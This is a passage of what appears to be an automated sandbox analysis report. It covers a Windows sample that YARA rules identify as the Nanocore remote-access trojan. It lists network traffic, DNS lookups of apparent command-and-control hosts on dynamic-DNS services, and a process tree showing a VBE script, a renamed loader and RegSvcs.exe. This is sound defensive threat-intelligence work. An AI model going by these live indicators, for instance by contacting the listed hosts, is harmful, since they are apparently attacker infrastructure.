May 30, 2023 06:22:43.112445116 CEST	49701	61715	192.168.2.3	192.169.69.26
May 30, 2023 06:22:43.604094982 CEST	61715	49701	192.169.69.26	192.168.2.3
May 30, 2023 06:22:47.673362017 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:47.970376015 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:47.970663071 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:47.971580982 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.247226954 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.259541035 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.490556955 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.515604973 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.886370897 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.886584044 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.886869907 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.886950016 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.887016058 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.887078047 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.892366886 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.892452955 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.893244982 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.893294096 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.893306017 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.893353939 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.894494057 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.894558907 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.894566059 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.894632101 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.895184040 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.895242929 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.895243883 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.895298958 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:48.924403906 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:48.924628019 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.100361109 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.100428104 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.100476980 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.100496054 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.101037979 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.101102114 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.102283001 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.102328062 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.102385044 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.103725910 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.103775024 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.103837013 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.103981972 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.104088068 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.104147911 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.105066061 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.105113029 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.105159044 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.105200052 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.105202913 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.105254889 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.106223106 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.107091904 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.107141018 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.107165098 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.131263971 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.131875992 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.133136988 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.155262947 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.155368090 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.294261932 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.294420004 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.294507980 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.294727087 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.296103954 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.296150923 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.296163082 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.296705961 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.296766996 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.297456026 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.297605991 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.297669888 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.298506021 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.298548937 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.298615932 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.299462080 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.300280094 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.300343037 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.300405979 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.301075935 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.301135063 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.301282883 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.302018881 CEST	61715	49702	212.193.30.230	192.168.2.3
May 30, 2023 06:22:49.302081108 CEST	49702	61715	192.168.2.3	212.193.30.230
May 30, 2023 06:22:49.303183079 CEST	61715	49702	212.193.30.230	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2023 06:22:30.992628098 CEST	52387	53	192.168.2.3	8.8.8.8
May 30, 2023 06:22:31.116616964 CEST	53	52387	8.8.8.8	192.168.2.3
May 30, 2023 06:22:36.918315887 CEST	56924	53	192.168.2.3	8.8.8.8
May 30, 2023 06:22:37.032358885 CEST	53	56924	8.8.8.8	192.168.2.3
May 30, 2023 06:22:42.609644890 CEST	60625	53	192.168.2.3	8.8.8.8
May 30, 2023 06:22:42.731828928 CEST	53	60625	8.8.8.8	192.168.2.3
May 30, 2023 06:22:47.643842936 CEST	49302	53	192.168.2.3	8.8.8.8
May 30, 2023 06:22:47.670588017 CEST	53	49302	8.8.8.8	192.168.2.3
May 30, 2023 06:22:54.712057114 CEST	53975	53	192.168.2.3	8.8.8.8
May 30, 2023 06:22:54.741142988 CEST	53	53975	8.8.8.8	192.168.2.3
May 30, 2023 06:23:00.715585947 CEST	51139	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:00.748215914 CEST	53	51139	8.8.8.8	192.168.2.3
May 30, 2023 06:23:07.733160973 CEST	52955	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:07.753385067 CEST	53	52955	8.8.8.8	192.168.2.3
May 30, 2023 06:23:15.454030991 CEST	60582	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:15.482513905 CEST	53	60582	8.8.8.8	192.168.2.3
May 30, 2023 06:23:20.963572979 CEST	57134	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:20.992204905 CEST	53	57134	8.8.8.8	192.168.2.3
May 30, 2023 06:23:27.025173903 CEST	62050	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:27.045439959 CEST	53	62050	8.8.8.8	192.168.2.3
May 30, 2023 06:23:33.817295074 CEST	56042	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:33.852931023 CEST	53	56042	8.8.8.8	192.168.2.3
May 30, 2023 06:23:39.982450008 CEST	59636	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:40.005990028 CEST	53	59636	8.8.8.8	192.168.2.3
May 30, 2023 06:23:46.009864092 CEST	55638	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:46.030122995 CEST	53	55638	8.8.8.8	192.168.2.3
May 30, 2023 06:23:52.003278017 CEST	57704	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:52.038084030 CEST	53	57704	8.8.8.8	192.168.2.3
May 30, 2023 06:23:58.118482113 CEST	65320	53	192.168.2.3	8.8.8.8
May 30, 2023 06:23:58.153744936 CEST	53	65320	8.8.8.8	192.168.2.3
May 30, 2023 06:24:04.627254963 CEST	60767	53	192.168.2.3	8.8.8.8
May 30, 2023 06:24:04.654015064 CEST	53	60767	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 30, 2023 06:22:30.992628098 CEST	192.168.2.3	8.8.8.8	0xaf79	Standard query (0)	december2n.duckdns.org	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:36.918315887 CEST	192.168.2.3	8.8.8.8	0x339d	Standard query (0)	december2n.duckdns.org	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:42.609644890 CEST	192.168.2.3	8.8.8.8	0xc42f	Standard query (0)	december2n.duckdns.org	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:47.643842936 CEST	192.168.2.3	8.8.8.8	0xaf9e	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:54.712057114 CEST	192.168.2.3	8.8.8.8	0x36f3	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:00.715585947 CEST	192.168.2.3	8.8.8.8	0x69a5	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:07.733160973 CEST	192.168.2.3	8.8.8.8	0xf441	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:15.454030991 CEST	192.168.2.3	8.8.8.8	0xf0d0	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:20.963572979 CEST	192.168.2.3	8.8.8.8	0x2736	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:27.025173903 CEST	192.168.2.3	8.8.8.8	0xe04b	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:33.817295074 CEST	192.168.2.3	8.8.8.8	0xbe59	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:39.982450008 CEST	192.168.2.3	8.8.8.8	0xedab	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:46.009864092 CEST	192.168.2.3	8.8.8.8	0x4b6d	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:52.003278017 CEST	192.168.2.3	8.8.8.8	0x76a7	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:58.118482113 CEST	192.168.2.3	8.8.8.8	0x1919	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false
May 30, 2023 06:24:04.627254963 CEST	192.168.2.3	8.8.8.8	0x9f7a	Standard query (0)	december2nd.ddns.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 30, 2023 06:22:31.116616964 CEST	8.8.8.8	192.168.2.3	0xaf79	No error (0)	december2n.duckdns.org	192.169.69.26	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:37.032358885 CEST	8.8.8.8	192.168.2.3	0x339d	No error (0)	december2n.duckdns.org	192.169.69.26	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:42.731828928 CEST	8.8.8.8	192.168.2.3	0xc42f	No error (0)	december2n.duckdns.org	192.169.69.26	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:47.670588017 CEST	8.8.8.8	192.168.2.3	0xaf9e	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:22:54.741142988 CEST	8.8.8.8	192.168.2.3	0x36f3	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:00.748215914 CEST	8.8.8.8	192.168.2.3	0x69a5	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:07.753385067 CEST	8.8.8.8	192.168.2.3	0xf441	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:15.482513905 CEST	8.8.8.8	192.168.2.3	0xf0d0	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:20.992204905 CEST	8.8.8.8	192.168.2.3	0x2736	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:27.045439959 CEST	8.8.8.8	192.168.2.3	0xe04b	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:33.852931023 CEST	8.8.8.8	192.168.2.3	0xbe59	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:40.005990028 CEST	8.8.8.8	192.168.2.3	0xedab	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:46.030122995 CEST	8.8.8.8	192.168.2.3	0x4b6d	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:52.038084030 CEST	8.8.8.8	192.168.2.3	0x76a7	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:23:58.153744936 CEST	8.8.8.8	192.168.2.3	0x1919	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false
May 30, 2023 06:24:04.654015064 CEST	8.8.8.8	192.168.2.3	0x9f7a	No error (0)	december2nd.ddns.net	212.193.30.230	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	06:22:03
Start date:	30/05/2023
Path:	C:\Users\user\Desktop\P05jmXYKpr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\P05jmXYKpr.exe
Imagebase:	0x950000
File size:	1115860 bytes
MD5 hash:	DB555A9DE355C70681E2E5F9ED38A335
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: wscript.exePID: 7360, Parent PID: 7296

General

Target ID:	1
Start time:	06:22:11
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Imagebase:	0x350000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 7412, Parent PID: 7360

General

Target ID:	2
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /release
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 7420, Parent PID: 7412

General

Target ID:	3
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exePID: 7432, Parent PID: 7360

General

Target ID:	4
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 7460, Parent PID: 7432

General

Target ID:	5
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: ipconfig.exePID: 7480, Parent PID: 7412

General

Target ID:	6
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /release
Imagebase:	0x1a0000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: boaliim.datPID: 7512, Parent PID: 7432

General

Target ID:	7
Start time:	06:22:17
Start date:	30/05/2023
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat
Wow64 process (32bit):	true
Commandline:	boaliim.dat ikvvfncnn.bmp
Imagebase:	0x250000
File size:	909912 bytes
MD5 hash:	D70543055E19B63641C7D5CB908EAEC7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 53%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exePID: 7620, Parent PID: 7360

General

Target ID:	8
Start time:	06:22:20
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ipconfig /renew
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 7628, Parent PID: 7620

General

Target ID:	9
Start time:	06:22:20
Start date:	30/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ipconfig.exePID: 7660, Parent PID: 7620

General

Target ID:	10
Start time:	06:22:20
Start date:	30/05/2023
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	ipconfig /renew
Imagebase:	0x1a0000
File size:	29184 bytes
MD5 hash:	B0C7423D02A007461C850CD0DFE09318
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: RegSvcs.exePID: 7772, Parent PID: 7512

General

Target ID:	13
Start time:	06:22:28
Start date:	30/05/2023
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xd20000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) 